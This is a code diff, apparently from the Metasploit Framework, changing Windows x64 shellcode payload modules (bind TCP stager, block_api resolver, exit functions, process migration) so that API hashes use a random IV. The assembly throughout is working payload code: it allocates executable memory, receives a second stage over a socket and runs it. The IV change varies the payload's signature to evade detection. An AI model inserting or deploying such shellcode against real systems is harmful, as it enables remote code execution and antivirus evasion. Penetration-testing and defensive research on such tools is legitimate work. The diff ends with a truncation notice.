xor rcx, rcx ; NULL as we dont care where the allocation is.
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
@@ -238,7 +238,7 @@ module Payload::Windows::BindTcp_x64
mov r8, rsi ; length
mov rdx, rbx ; the current address into our second stages RWX buffer
mov rcx, rdi ; the saved socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
call rbp ; recv( s, buffer, length, 0 );
add rbx, rax ; buffer += bytes_received
@@ -10,12 +10,31 @@ module Msf
###
module Payload::Windows::BlockApi_x64
@block_api_iv = nil
def block_api_iv(opts={})
@block_api_iv ||= rand(0x100000000)
end
def asm_block_api(opts={})
Rex::Payloads::Shuffle.from_graphml_file(
asm = Rex::Payloads::Shuffle.from_graphml_file(
File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x64.graphml'),
arch: ARCH_X64,
name: 'api_call'
)
iv = opts.fetch(:block_api_iv) { block_api_iv }
# Patch the assembly to set the correct IV
# db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00 => mov r9d, <iv>
iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
unless asm.include?("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00")
raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})"
end
asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}")
end
def block_api_hash(mod, func, opts={})
iv = opts.fetch(:block_api_iv) { block_api_iv }
Rex::Text.block_api_hash(mod, func, iv: iv)
end
end
@@ -23,7 +23,7 @@ module Payload::Windows::Exitfunk_x64
asm << %Q^
push 0 ;
pop rcx ; set the exit function parameter
mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)}
mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')}
mov r10d, ebx ; place the correct EXITFUNK into r10d
call rbp ; SetUnhandledExceptionFilter(0)
push 0 ;
@@ -34,7 +34,7 @@ module Payload::Windows::Exitfunk_x64
asm << %Q^
push 0 ;
pop rcx ; set the exit function parameter
mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}
mov r10d, ebx ; place the correct EXITFUNK into r10d
call rbp ; call EXITFUNK( 0 );
^
@@ -43,7 +43,7 @@ module Payload::Windows::Exitfunk_x64
asm << %Q^
push 0 ;
pop rcx ; set the exit function parameter
mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')}
call rbp ; ExitProcess(0)
^
@@ -51,7 +51,7 @@ module Payload::Windows::Exitfunk_x64
asm << %Q^
push 300000 ; 300 seconds
pop rcx ; set the sleep function parameter
mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')}
call rbp ; Sleep(300000)
jmp exitfunk ; repeat
^
@@ -31,7 +31,7 @@ module Payload::Windows::MigrateCommon_x64
#{generate_migrate(opts)}
signal_event:
mov rcx, qword [rsi] ; Event handle is pointed at by rsi
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')}
call rbp ; SetEvent(handle)
call_payload:
call qword [rsi+8] ; Invoke the associated payload
@@ -32,7 +32,7 @@ module Payload::Windows::MigrateNamedPipe_x64
mov rdi, qword [rsi+16] ; The duplicated pipe handle is in the migrate context.
signal_pipe_event:
mov rcx, qword [rsi] ; Event handle is pointed at by rsi
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')}
call rbp ; SetEvent(handle)
call_pipe_payload:
call qword [rsi+8] ; call the associated payload
@@ -38,13 +38,13 @@ module Payload::Windows::MigrateTcp_x64
sub rsp, #{WSA_SIZE} ; alloc size, plus alignment (used later)
mov r13, rsp ; save pointer to this struct
sub rsp, 0x28 ; space for api function calls (really?)
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call rbp ; LoadLibraryA('ws2_32')
init_networking:
mov rdx, r13 ; pointer to the wsadata struct
push 2
pop rcx ; Version = 2
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call rbp ; WSAStartup(Version, &WSAData)
create_socket:
xor r8, r8 ; protocol not specified
@@ -55,7 +55,7 @@ module Payload::Windows::MigrateTcp_x64
pop rdx ; SOCK_STREAM
push 2
pop rcx ; AF_INET
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call rbp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
xchg rdi, rax
^

Some files were not shown because too many files have changed in this diff Show More